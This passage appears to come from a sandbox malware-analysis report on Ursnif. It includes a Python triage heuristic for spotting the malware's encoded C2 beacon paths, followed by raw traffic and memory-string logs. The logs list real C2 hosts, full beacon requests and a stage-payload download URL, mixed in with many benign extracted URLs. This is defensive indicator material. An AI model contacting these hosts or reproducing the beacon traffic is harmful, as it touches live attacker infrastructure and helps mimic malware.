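    words = [int(user[i:i + 8], 16) for i in range(0, 32, 8)]
    values = (int(cfg["soft"]), int(cfg["version"]), *words,
              int(cfg["server"]), int(cfg["id"]), int(cfg["crc"], 16))
    return fmt % values


# Hosts contacted during this analysis (from the Networking section of the report).
C2_HOSTS = {"api10.laptok.at", "api3.lepini.at", "c56.lepini.at"}
# Assumed meaning of the escape-like tokens; order matters (longest token first).
TOKENS = {"_0A_0D": "", "_2B": "+", "_2F": "/"}


def ursnif_style_path(url: str) -> list:
    """Heuristic triage of one URL. Returns the reasons it looks like Ursnif C2
    traffic (empty list = nothing suspicious). The path is joined across '/' before
    token matching because the captured paths cut tokens in half (e.g. '_0A_0/DDQ')."""
    parts = urlsplit(url)
    segments = [s for s in parts.path.split("/") if s]
    blob = "".join(segments)
    token_hits = sum(blob.count(t) for t in TOKENS)
    decoded = blob
    for tok, rep in TOKENS.items():
        decoded = decoded.replace(tok, rep)
    base64ish = re.fullmatch(r"[A-Za-z0-9+/]+", decoded) is not None
    reasons = []
    if parts.hostname in C2_HOSTS:
        reasons.append("known-c2-host")
    if len(segments) >= 8 and len(blob) >= 100 and token_hits >= 1 and base64ish:
        reasons.append("encoded-beacon-path")
    return reasons


# Captured in this report (IE-injected and Firefox-UA beacons, the t64.dat fetch, a favicon).
BEACON_URL_IE = "http://api10.laptok.at/api1/eo_2BIlYIakkFjtKlYh34Ss/HzB35UuLk7/cRenSoj_2Bmnd8Dj2/x181tJXN27RB/cqhJWTWpoyc/WU_2BHDqXNQHyF/aDmY5Jw7iTMS8Sm28wuKE/aE7o1rgRq9Zga98a/Lfk5mVpEscNl_2B/PEL_2BzPSrlVxe7hjg/VwIhIVlrD/Q75QLCo1R_2FGgXCAPcg/a82_2BpHTzLUJRE2skc/NrjfTQynui55314yUu2IJ7/NuVMlNbXu5eLz/t14q6jvB/NktWJXjAjAGBXHfWPm_0A_0/DDQhZDtGQu/HIp9aDbbcUD_2FJMS/dglTkO1jgRVp8/MzuzdPBBs/X"
BEACON_URL_FF = "http://api3.lepini.at/api1/y593T41s/lL3TOAWpr8BAEirizPVY1nr/gHh_2FJm75/zCdiX47c4HpAxyRkT/qHLmarlSHot9/ONkJbY9gGOt/fQ6HQhMd_2B2I2/UNHWo1YbKowVIMWnTVz3S/Fy9pHKfmC1MflrBD/0HEKH0eANuLLaQi/NyVaE39P8WW680xE9C/zKHHHrqp_/2BtcUAWB7_2BpbaOT4FO/b_2BpTr1WFjW1cxH4os/NuSvnY4dMHLhOh3P7AJ4TT/NndN5S4150t5l/lDv81A2q/V_2FLzQ_2B_0A_0D_2B1i_2/FVUx_2B8Aw/gTJkpEcUGFJt7Exz1/ugevcO8oI6oRZ/xs5xjc"
STAGE_URL = "http://c56.lepini.at/jvassets/xI/t64.dat"
FAVICON_URL = "http://api10.laptok.at/favicon.ico"
# Constructed benign control.
BENIGN_URL = "https://www.example.com/api/v1/users/42/profile"

if __name__ == "__main__":
    print(render_beacon(CONFIG))
    for u in (BEACON_URL_IE, BEACON_URL_FF, STAGE_URL, FAVICON_URL, BENIGN_URL):
        print(ursnif_style_path(u) or "-", u[:60])
```

The t64.dat and favicon requests are only caught by the host list: their paths are ordinary, which is why an indicator feed needs the hosts as well as the path heuristic. The rendered plaintext is useful for matching decrypted beacons in a proxy or sandbox that has the key, not for raw network captures.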
Source: global traffic; HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: c56.lepini.at
Source: Joe Sandbox View; IP Address: 47.241.19.44
Source: global traffic; HTTP traffic detected: GET /api1/eo_2BIlYIakkFjtKlYh34Ss/HzB35UuLk7/cRenSoj_2Bmnd8Dj2/x181tJXN27RB/cqhJWTWpoyc/WU_2BHDqXNQHyF/aDmY5Jw7iTMS8Sm28wuKE/aE7o1rgRq9Zga98a/Lfk5mVpEscNl_2B/PEL_2BzPSrlVxe7hjg/VwIhIVlrD/Q75QLCo1R_2FGgXCAPcg/a82_2BpHTzLUJRE2skc/NrjfTQynui55314yUu2IJ7/NuVMlNbXu5eLz/t14q6jvB/NktWJXjAjAGBXHfWPm_0A_0/DDQhZDtGQu/HIp9aDbbcUD_2FJMS/dglTkO1jgRVp8/MzuzdPBBs/X HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: api10.laptok.at | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /favicon.ico HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: api10.laptok.at | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /api1/XO7QtVtOxvAU4dkxK/MUnrl2paNhM_/2FhuHDAlai0/NYk3fgMRD21K6x/275eVNVSoFX1z_2Fdgzow/MjYIlNw6pXOFZtoH/ck22OsEBi4g5A21/99QRfbFqCod1fjkNsK/XxVSIrdVG/7FHa2ER9Ft02LqAkeU18/04NkD5rjB5JZqGFdQLM/maVmTCXIlwp0EX02aBt_2F/Clo4eegFdQ1lk/P1pW4ZJ5/wIbd6IdM2um9GQiRmu4HTYW/_2FpOuqNYz/HTi5jYJ7JeAd_0A_0/Dg9X8gZJHmh_/2B_2FHgF5eg/hemqUNvmE05Kam/e7yAaZ9rb60RXTZYuOS2q/HQUlA_2F4Fhmtp/3js HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: api10.laptok.at | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /favicon.ico HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: api10.laptok.at | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /api1/6pQLMKxXX9R7A/0Kb9p8K4/BHJoVof6Fq7pyt4TOfPymNR/ZySC71MXSL/l8MLURonpjSVljDCJ/ih2L1Bdz8irJ/_2F8lSRByE0/SM6_2BP71LZESU/h3tJD1hVHbKiwkwE2IeWs/IizA7p6En4mCz2WA/NXpt5f6m6Jvf3pc/Mrs5oQ_2FPRoyih4jN/nKDhf733I/JOO4yWaqPLDk_2FATWs4/au98UO6brkA9iK_2BJ2/m2zSLNazAj56j867SYe4xl/cUNEATTbA9T6H/G_0A_0DY/h1e_2Bl0ZjLJIZf95sH7_2B/vbmm46cNio/kWkp8HAde3SsZyg36/ZN_2BmnjrWTcHtn/70R8a3b9 HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: api10.laptok.at | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: c56.lepini.at
Source: global traffic; HTTP traffic detected: GET /api1/y593T41s/lL3TOAWpr8BAEirizPVY1nr/gHh_2FJm75/zCdiX47c4HpAxyRkT/qHLmarlSHot9/ONkJbY9gGOt/fQ6HQhMd_2B2I2/UNHWo1YbKowVIMWnTVz3S/Fy9pHKfmC1MflrBD/0HEKH0eANuLLaQi/NyVaE39P8WW680xE9C/zKHHHrqp_/2BtcUAWB7_2BpbaOT4FO/b_2BpTr1WFjW1cxH4os/NuSvnY4dMHLhOh3P7AJ4TT/NndN5S4150t5l/lDv81A2q/V_2FLzQ_2B_0A_0D_2B1i_2/FVUx_2B8Aw/gTJkpEcUGFJt7Exz1/ugevcO8oI6oRZ/xs5xjc HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0 | Host: api3.lepini.at
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp; String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp; String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp; String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp; String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp; String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: unknown; DNS traffic detected: queries for: api10.laptok.at
Source: unknown; HTTP traffic detected: POST /api1/Tnjw5UXPt/L5vQXVeFjcg_2Bj0ZUjt/9bFRVhN6pC9d2H18KaD/RGYbWbOkYjL_2F2HT335i7/71DFI8PUSCc4m/XMwm02nY/k4iLrUAYDDvtv52BcxN4JBR/mhz_2Ft8VK/cNDRoyaxMsIxwxiz7/z7UQYEM6OBEY/IsC_2BO60JP/8DQpEZ9_2FIB1d/I_2FlPwkTE_2BidQ3R_2F/R3ia9KhwObxc1lnS/i7zxvyPIE4qo3ur/Ak3ONUjFI0trLtGmdw/2_2B5VotK/XxvvgQefWGm6F_0A_0Dg/2ryULZlOS2cT7CbqIGS/McMh6tWsIGNL2hue3Skqhq/rpuSb HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0 | Content-Length: 2 | Host: api3.lepini.at
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Fri, 20 Nov 2020 09:40:54 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Content-Encoding: gzip | Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a | Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: explorer.exe, 0000001D.00000000.383246627.0000000006FE0000.00000002.00000001.sdmp; String found in binary or memory: http://%s.com
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp; String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 0000001D.00000000.389327777.0000000008C64000.00000004.00000001.sdmp; String found in binary or memory: http://api10.laptok.at/ap
Source: explorer.exe, 0000001D.00000000.389327777.0000000008C64000.00000004.00000001.sdmp; String found in binary or memory: http://api10.laptok.at/api1/6pQLMKxXX9R7A/0Kb9p8K4/BHJoVof6Fq7pyt4TOfPymNAAZYZ
Source: explorer.exe, 0000001D.00000000.388307908.000000000891C000.00000004.00000001.sdmp, explorer.exe, 0000001D.00000000.389327777.0000000008C64000.00000004.00000001.sdmp; String found in binary or memory: http://api10.laptok.at/api1/6pQLMKxXX9R7A/0Kb9p8K4/BHJoVof6Fq7pyt4TOfPymNR/ZySC71MXSL/l8MLURonpjSVlj
Source: explorer.exe, 0000001D.00000000.389327777.0000000008C64000.00000004.00000001.sdmp; String found in binary or memory: http://api10.laptok.at/api1/XO7QtVtOxvAU4dkxK/MUnrl2paNhM_/2FhuHDAlai0/NYk3fgMRD21K6x/275eVNVSoFX1z_
Source: explorer.exe, 0000001D.00000000.392738198.000000000DC5F000.00000004.00000001.sdmp; String found in binary or memory: http://api10.laptok.at/api1/eo_2BIlYIakkFjtKlYh34Ss/HzB35UuLk7/cRenSoj_2Bmnd8Dj2/x181tJXN27RB/cqhJWT
Source: explorer.exe, 0000001D.00000002.518168118.00000000053C4000.00000004.00000001.sdmp; String found in binary or memory: http://api3.lepini.at/api1/Tnjw5UXPt/L5vQXVeFjcg_2Bj0ZUjt/9bFRVhN6pC9d2H18KaD/RGYbWbOkYjL_2F2HT335i7
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp; String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp; String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp; String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp; String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp; String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp; String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp; String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 0000001D.00000000.383246627.0000000006FE0000.00000002.00000001.sdmp; String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp; String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp; String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp; String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp; String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp; String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp; String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp; String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp; String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp; String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp; String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp; String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp; String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp; String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp; String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp; String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp; String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp; String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp; String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp; String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 0000001D.00000000.388809444.0000000008B54000.00000004.00000001.sdmp; String found in binary or memory: http://c56.lepini.at/jvassets/xI/t64.dat
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://cnet.search.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
            Source: loaddll32.exe, powershell.exe, 00000013.00000003.358522767.0000022F9D7D0000.00000004.00000001.sdmp, control.exe, 0000001A.00000003.354083922.0000020E4A350000.00000004.00000001.sdmp, explorer.exe, 0000001D.00000002.511989031.0000000003B8E000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001E.00000002.510030791.000002413CA4E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000020.00000002.502898897.000001E7666AE000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
            Source: loaddll32.exe, 00000000.00000002.370796430.0000000002810000.00000040.00000001.sdmp, powershell.exe, 00000013.00000003.358522767.0000022F9D7D0000.00000004.00000001.sdmp, control.exe, 0000001A.00000003.354083922.0000020E4A350000.00000004.00000001.sdmp, explorer.exe, 0000001D.00000002.511989031.0000000003B8E000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001E.00000002.510030791.000002413CA4E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000020.00000002.502898897.000001E7666AE000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
            Source: powershell.exe, 00000013.00000003.369200959.0000022F9DAA8000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://es.ask.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://find.joins.com/
            Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
            Source: loaddll32.exe, 00000000.00000002.370796430.0000000002810000.00000040.00000001.sdmp, loaddll32.exe, 00000000.00000003.340776035.0000000002850000.00000004.00000001.sdmp, powershell.exe, 00000013.00000003.358522767.0000022F9D7D0000.00000004.00000001.sdmp, control.exe, 0000001A.00000003.354083922.0000020E4A350000.00000004.00000001.sdmp, explorer.exe, 0000001D.00000002.511989031.0000000003B8E000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001E.00000002.510030791.000002413CA4E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000020.00000002.502898897.000001E7666AE000.00000004.00000001.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
            Source: powershell.exe, 00000013.00000003.316077388.0000022F8657E000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
            Source: powershell.exe, 00000013.00000003.315876431.0000022F863B7000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://rover.ebay.com
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
            Source: powershell.exe, 00000013.00000002.373535807.0000022F84FD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.about.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.in/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.auone.jp/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.de/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.es/
